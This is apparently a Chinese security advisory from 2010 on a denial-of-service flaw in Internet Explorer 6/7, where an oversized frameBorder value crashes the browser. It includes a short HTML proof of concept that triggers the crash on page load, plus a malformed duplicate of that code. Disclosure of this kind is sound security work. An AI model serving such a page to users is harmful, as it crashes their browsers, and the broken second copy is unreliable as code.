Microsoft IE帧边界属性远程拒绝服务漏洞

发表于 2010年07月30日
Vulndb
更新于 2013年02月06日 17:16:47 下午

发布时间：2010-07-27
影响版本：IE6/IE7
测试环境：Windows Xp Sp3

漏洞描述:

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

用户使用IE访问了恶意网页并向frame.frameBorder属性传送了超长整数值或字符串就可以导致浏览器崩溃。

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<head>
<script>
function dos(){
  var e = document.createElement('frame');
  var prop = 'frameBorder';
  e[prop] = 0123456789;
}
</script>
</head>
<body onload="dos()">
</body>
</html>

<html>

<head>

function dos(){

var e = document.createElement('frame');

var prop = 'frameBorder';

e[prop] = 0123456789;

}

</script>

</head>

</body>

</html>

安全建议:

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

标签：IE , Microsoft , 漏洞原文连接：Microsoft IE帧边界属性远程拒绝服务漏洞 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

Firefox CSS选择器跨域信息泄露漏洞 9款国内免费网盘